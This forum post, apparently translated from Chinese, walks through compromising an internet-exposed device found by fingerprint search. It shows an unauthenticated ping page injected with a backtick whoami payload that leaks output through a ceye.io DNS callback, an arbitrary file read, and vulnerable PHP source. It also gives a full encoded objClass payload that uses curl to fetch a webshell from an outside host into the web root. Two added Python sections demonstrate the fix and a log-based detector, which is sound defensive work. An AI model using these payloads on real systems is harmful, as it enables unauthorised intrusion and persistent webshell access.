admin posted on 2022-3-31 01:39:59

Web Security in Practice: Getting a Webshell Through an OS Command Injection Vulnerability

**一、Finding the entry point**

Right-clicking to view the page source showed a distinctive asset, images/select_bg.png. Searching ZoomEye (钟馗之眼) for that fingerprint gave the following:

![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)



Both reporter and [Technology, Inc.](https://www.zoomeye.org/searchResult?q=images%2Fselect_bg.png%20%2Bcountry:%22CN%22%20%2Btitle:%22Technology,%20Inc.%22&t=all) products carry this fingerprint. I had worked on this kind of system before and had its source code, so by walking the source tree against the target I found a page that could be reached without authentication.

Address:

[http://1.1.1.1//view/systemConfig/systemTool/ping/ping.php?text_target=&text_pingcount=5&text_packetsize=64](http://1.1.1.1/view/systemConfig/systemTool/ping/ping.php?text_target=&text_pingcount=5&text_packetsize=64), as shown:

![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)



Testing the ping function showed that its normal behaviour could be escaped to execute commands. The payload was:

`` `whoami`.1111.ceye.io ``

The backticks are shell command substitution: the server runs whoami and splices the result in front of .1111.ceye.io, so the name that ping tries to resolve carries the command output to the ceye.io DNS logging domain, without needing any command output in the HTTP response. As shown:

![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)



The DNS record that came back, as shown:

![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)



The current user is root.

**二、Chaining the vulnerabilities to get a webshell**

This writeup follows the order in which the bugs were found. Next I ran pwd through the same injection to get the web path, as shown:

![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)



The web path was /var/www/html/view/systemconfig/systemtool/.

Working through the application with Burp Suite also turned up an OS command injection and an arbitrary file read; the screenshot below is of the arbitrary file read:

![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)

The OS command injection is in /var/www/html/view/Behavior/toQuery.php (this path came from the commands run through the ping bypass in step one). Using the arbitrary file read, we read its source:

![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)


Source code:

```php
<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>

<?php
session_start();

if ($_GET["objClass"] == "")
    exit();

$param = $_REQUEST;

//echo "\n--------------------------\n";
//print_r($param);
//echo "\n--------------------------\n";

if ($_GET["method"] == "getList" || $_GET["method"] == "import" || $_GET["method"] == "processAlarm") {
    $param["user"] = $_SESSION["s_userName"];
    $param["lan"] = $_SESSION["lan"];
    $param["regUserpath"] = $_SESSION["regUserpath"];

    exec("rm -rf /tmp/cache");

    // objClass and method come straight from $_GET and are concatenated into
    // the command line with no escapeshellarg(): this is the OS command injection.
    $cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";
    $cmd .= " " . $_GET["objClass"];
    $cmd .= " " . $_GET["method"];
    $cmd .= " " . base64_encode(json_encode($param));

    file_put_contents("/tmp/query_cmd", $cmd);

    // Backgrounded with stdout discarded, so the injection is blind.
    exec($cmd . " > /dev/null &");
} else {
    require_once($_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
    $obj = new QueryInterface();
    $instance = $obj->getInstance();
    $instance->invokeMethod($_GET["objClass"], $_GET["method"], $param);
}

exit();
?>
```

A quick audit: the branch `if ($_GET["method"] == "getList" || $_GET["method"] == "import" || $_GET["method"] == "processAlarm")` is taken whenever method is one of getList, import or processAlarm. It builds `$cmd = "/usr/local/php/bin/php " . $_SERVER["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php"`, i.e. the php binary followed by the absolute web root plus system/behavior/behavior_query.php, then appends `$_GET["objClass"]` and `$_GET["method"]` separated by spaces with no escaping at all, records the line with `file_put_contents("/tmp/query_cmd", $cmd);` and finally runs `exec($cmd . " > /dev/null &");`. Whatever is sent in objClass therefore lands unquoted on a /bin/sh command line: a direct OS command injection. Two details matter for exploiting it: method must be one of the three allowed values or the exec() is never reached, and because the command is backgrounded with its output sent to /dev/null the injection is blind, so confirmation has to come out-of-band (a DNS callback as in the ping step, or a file written into the web root) rather than from the HTTP response. The demonstration follows.


![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)
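As an added example (my code, not the post's or the vendor's), the following Python reproduces at the shell level what both injections in this post do and what stops them: the ping.php payload relies on command substitution inside the target argument, the toQuery.php payload on a leading pipe plus a `#` that comments out the trailing `> /dev/null &`. `echo` stands in for ping(8) and the php binary so the demo runs offline and executes nothing harmful; the script path and all inputs are constructed for the demo. The fix shown (validate the value against an allowlist, then pass it as a separate argv element instead of through a shell string) corresponds in PHP to validating the values and wrapping each one in `escapeshellarg()` before `exec()`.

```python
"""Added example (not code from the post or the vendor): how the two injected
parameters reach /bin/sh, and the fix. `echo` stands in for ping(8) and the
php binary so everything here runs offline and harmlessly; QUERY_SCRIPT and
all inputs are constructed for the demo."""
import base64
import json
import re
import shlex
import subprocess
from typing import List

TOOL = "echo"  # stand-in for /bin/ping and /usr/local/php/bin/php
QUERY_SCRIPT = "/var/www/html/system/behavior/behavior_query.php"  # constructed path


def vulnerable_cmd(*parts: str) -> str:
    """Mirror the target code: every piece is glued into one string."""
    return " ".join(parts)


def run_shell(cmd: str) -> str:
    """PHP exec($cmd) equivalent: /bin/sh parses the whole string."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv(argv: List[str]) -> str:
    """No shell: each element reaches the program as one literal argument."""
    return subprocess.run(argv, capture_output=True, text=True).stdout


def demo_ping_injection(target: str) -> str:
    """ping.php pattern: the target is interpolated into 'ping -c N -s S <target>'."""
    return run_shell(vulnerable_cmd(TOOL, "ping -c 5 -s 64", target))


def demo_query_injection(obj_class: str) -> str:
    """toQuery.php pattern: objClass is appended after the php script path and
    the whole line is run with ' > /dev/null &' on the end ("e30=" is base64 of "{}")."""
    cmd = vulnerable_cmd(TOOL, "/usr/local/php/bin/php", QUERY_SCRIPT,
                         obj_class, "getList", "e30=", "> /dev/null &")
    return run_shell(cmd)


def demo_quoted(target: str) -> str:
    """Same shell string, but the value is quoted first (PHP: escapeshellarg())."""
    return run_shell(vulnerable_cmd(TOOL, "ping -c 5 -s 64", shlex.quote(target)))


def demo_argv_literal(value: str) -> str:
    """With argv there is no shell to interpret metacharacters at all."""
    return run_argv([TOOL, value])


# Allowlists for the proper fix. A bare hostname/IP cannot contain sh
# metacharacters, and banning a leading '-' also blocks argument injection
# (even without a shell, a target of "-f" would be read by ping as an option).
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
ALLOWED_METHODS = {"getList", "import", "processAlarm"}  # the three values from the source


def safe_ping(target: str, count: str, size: str) -> str:
    if not HOST_RE.match(target):
        raise ValueError("target is not a hostname or IP")
    n, s = int(count), int(size)  # int() raises ValueError on anything non-numeric
    if not (1 <= n <= 10 and 0 <= s <= 65507):
        raise ValueError("count/size out of range")
    return run_argv([TOOL, "ping", "-c", str(n), "-s", str(s), target])


def safe_query(obj_class: str, method: str, param: dict) -> str:
    if not IDENT_RE.match(obj_class) or method not in ALLOWED_METHODS:
        raise ValueError("objClass/method not allowed")
    blob = base64.b64encode(json.dumps(param).encode()).decode()
    return run_argv([TOOL, "/usr/local/php/bin/php", QUERY_SCRIPT, obj_class, method, blob])


def rejects(fn, *args) -> bool:
    """True if fn refuses the input with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    target = "`echo INJECTED`.1111.ceye.io"  # shape of the post's `whoami`.1111.ceye.io
    obj_class = "|echo INJECTED #'"          # shape of the post's |curl ... #' payload
    print(demo_ping_injection(target), end="")      # INJECTED substituted into the hostname
    print(demo_query_injection(obj_class), end="")  # only INJECTED: '#' ate the rest of the line
    print(demo_quoted(target), end="")              # backticks printed back literally
    print(demo_argv_literal(obj_class), end="")     # pipe printed back literally
    print(safe_ping("8.8.8.8", "5", "64"), end="")
    print(rejects(safe_ping, target, "5", "64"), rejects(safe_query, obj_class, "getList", {}))
```

The first two prints show `INJECTED`, the output of a command the caller never asked for; the quoted and argv variants print the same payload back as inert text. Moving to argv alone is not the whole fix, since option-looking values still reach the program, which is why `safe_ping` also refuses a leading hyphen and `safe_query` only accepts the three method names the source itself checks for.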



The injection point is the objClass= parameter shown in the request screenshot above. I first tried to get a bash reverse shell, but after a whole night of testing it never connected back, so in the end I used curl to download the webshell. The payload:

```
%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php
```

URL-decoded:

```
|curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php
```

The reason for so many pipe symbols is to close off whatever quoting context the injected string lands in: the same curl command is repeated behind `|`, `||`, backticks and the `#'` / `#\"` comment terminators, so that at least one copy runs whether the parameter ends up bare, inside single quotes or inside double quotes. In toQuery.php it is bare, so the first `|curl ...` runs (the php process's output is piped into curl, which ignores it) and the `#` comments out the rest of the line, including the original `> /dev/null &`; the copy with the `pcurl` typo only matters if that first curl fails. In the end curl downloaded the webshell successfully, as shown:

![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300)
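From the defender's side, the requests in this post leave a clear trail in the web server access log. The following Python, an added example and not part of the post, scans combined-format log lines for the two endpoints and flags parameter values the application would splice into exec(): anything other than a hostname or IP in text_target, non-numeric count/size values, and shell metacharacters in objClass or method. The log lines are constructed for the demo (IPs and timestamps are invented; the paths, parameter names and the two payloads are the ones the post shows).

```python
"""Added example (not from the post): scan web-server access logs for the two
injection points described above. The log lines are constructed for the demo
(IPs and timestamps invented); the request paths, parameter names and the two
payloads are the ones the post shows."""
import re
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qsl, urlsplit

# Constructed sample, Apache/Nginx combined format. Lines 2, 3 and 5 are attacks.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Mar/2022:01:35:00 +0800] "GET /view/systemConfig/systemTool/ping/ping.php?text_target=8.8.8.8&text_pingcount=5&text_packetsize=64 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [31/Mar/2022:01:36:10 +0800] "GET /view/systemConfig/systemTool/ping/ping.php?text_target=%60whoami%60.1111.ceye.io&text_pingcount=5&text_packetsize=64 HTTP/1.1" 200 480 "-" "Mozilla/5.0"
10.0.0.5 - - [31/Mar/2022:01:38:42 +0800] "GET /view/Behavior/toQuery.php?objClass=%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%20%23%27&method=getList HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [31/Mar/2022:01:39:01 +0800] "GET /view/Behavior/toQuery.php?objClass=Alarm&method=getList HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [31/Mar/2022:01:40:13 +0800] "GET /view/systemConfig/systemTool/ping/ping.php?text_target=example.com&text_pingcount=5%3Bid&text_packetsize=64 HTTP/1.1" 200 470 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameters each endpoint splices into exec(), per the source in the post.
# Keys are lower-cased because the post shows the path both as
# systemConfig/systemTool (URL) and systemconfig/systemtool (on disk).
WATCHED: Dict[str, Set[str]] = {
    "/view/systemconfig/systemtool/ping/ping.php": {"text_target", "text_pingcount", "text_packetsize"},
    "/view/behavior/toquery.php": {"objClass", "method"},
}
NUMERIC = {"text_pingcount", "text_packetsize"}
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")
# Characters that end, chain or substitute commands in sh; '#' is included
# because the post's payload uses it to comment out the rest of the line.
META_RE = re.compile(r"[;&|`$<>(){}\n\r#'\"\\]")


def suspicious(name: str, value: str) -> bool:
    """Allowlist where the legitimate shape is known, denylist otherwise."""
    if name in NUMERIC:
        return not value.isdigit()
    if name == "text_target":
        return HOST_RE.match(value) is None
    return META_RE.search(value) is not None


def scan_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    watched = WATCHED.get(url.path.lower())
    if not watched:
        return None
    # parse_qsl percent-decodes, so %60 and %7C are inspected as ` and |,
    # which is what PHP puts into $_GET and therefore onto the command line.
    hits = [(k, v) for k, v in parse_qsl(url.query) if k in watched and suspicious(k, v)]
    if not hits:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "status": m["status"], "path": url.path, "hits": hits}


def scan_log(text: str) -> List[dict]:
    return [r for r in (scan_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["ts"], r["ip"], r["path"], r["hits"])
```

objClass and method are read from `$_GET` in the source, so the query string the web server records is the right place to look; the base64-encoded `$param` blob that also reaches the command line is inert because of the encoding. A value that only turns dangerous after a second round of percent-decoding would reach the shell still encoded, so a single decode matches what PHP does. The text_target check is an allowlist rather than a metacharacter denylist, which is the same rule a fixed ping page would enforce before calling exec().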




**三、Summary**

This case ended in a webshell largely because several vulnerabilities could be combined. First, viewing the page source identified the product, which I had tested before, so I knew where to look and found the unauthenticated ping page. Bypassing ping's normal function to run pwd gave the absolute web root. Next, the arbitrary file read was used to pull the PHP file suspected of OS command execution and audit it, which confirmed the bug. Finally an OS command execution payload was built and the webshell dropped. The whole path was a chain of vulnerabilities, and penetration testing often comes down to luck: had any one link been missing, or not found, getting the webshell could have failed.

In short, luck and bug-hunting fundamentals matter equally. Thanks for reading!